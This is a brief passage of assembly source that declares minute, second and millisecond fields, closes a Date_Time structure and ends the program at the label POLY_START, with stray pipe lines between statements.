Current_Minute DW 0
|
|
Current_Second DW 0
|
|
Current_Millisecond DW 0
|
|
Date_Time ENDS
|
|
|
|
END POLY_START
|